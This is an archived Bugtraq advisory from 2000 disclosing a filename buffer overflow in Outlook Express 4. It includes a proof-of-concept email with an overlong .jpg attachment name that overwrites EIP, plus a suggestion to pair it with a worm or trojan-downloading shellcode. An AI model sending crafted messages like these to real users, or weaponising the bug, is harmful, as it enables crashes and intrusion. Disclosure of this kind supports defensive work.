[14882] in bugtraq
Overflow in Outlook Express 4.* - too long filenames with graphic
daemon@ATHENA.MIT.EDU (Ultor)
Fri May 12 12:41:29 2000
Mime-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_001C_01BFBC1B.20C9FAF0"
Message-Id: <002801bfbc0a$7feac390$0100a8c0@ultor>
Date: Fri, 12 May 2000 14:05:28 +0200
Reply-To: Ultor <Ultor@HERT.ORG>
From: Ultor <Ultor@HERT.ORG>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
This is a multi-part message in MIME format.
------=_NextPart_000_001C_01BFBC1B.20C9FAF0
Content-Type: text/plain;
charset="iso-8859-2"
Content-Transfer-Encoding: 7bit
==== APPLICATION AFFECTED
Outlook Express 4.* (5.* is not affected)
==== DESCRIPTION
All attached graphic files are automatically shown in the Outlook Express
while viewing the e-mail. The problem is that long filenames with *.jpg
*.bmp extension makes overflow if filename lenght is longer then 256
characters.
==== EXAMPLE
We need more than 267 characters to overwrite EIP cause of 'C:\TEMP' on the
begining of buffer. This makes little problem with exploitation. Here is
example of such e-mail
------=_NextPart_000_0008_01BF5479.70140740
Content-Type: text/plain;
name="hert.jpg"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="AAAABBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.jpg"
------=_NextPart_000_0008_01BF5479.70140740--
EIP is overwriten here by 'BBBB'.
==== EXPLOITATION
It's little hard to exploit it cause buffer is addressed in addr with '00'
and we got 'C:\TEMP' which overwrites stack before our data. You will need
some tricks to exploit this. I believe this bug could be very dangerous if
connected somehow with worm cause you would only have to view the message to
run the exploit. Using shellcode which downloads trojan from some URL on the
affected machine would be interesting idea too.
Greeetz to HERT,Lam3rZ,TESO
----------------------
Mark Bialoglowy [Ultor@hert.org] --- Network Security Consultant
Age: 19 -- Country: PL -- PGP: http://www.hert.org/pgp/Ultor.asc
CODE: C / Delphi / w32asm / Linux / SQL / CGI / HTML / VRML / AI
----------------------
------=_NextPart_000_001C_01BFBC1B.20C9FAF0
Content-Type: message/rfc822;
name="crash_oe.eml"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment;
filename="crash_oe.eml"
From: "Ultor" <Ultor@hert.org>
To: <Ultor@hert.org>
Subject: What do u want to crash today ?
Date: Sat, 1 Jan 2000 16:58:33 +0100
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0008_01BF5479.70140740"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 4.72.3110.1
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.1
This is a multi-part message in MIME format.
------=_NextPart_000_0008_01BF5479.70140740
Content-Type: text/plain;
charset="iso-8859-2"
Content-Transfer-Encoding: 7bit
------=_NextPart_000_0008_01BF5479.70140740
Content-Type: text/plain;
name="hert.jpg"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="AAAABBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.jpg"
------=_NextPart_000_0008_01BF5479.70140740--
------=_NextPart_000_001C_01BFBC1B.20C9FAF0--
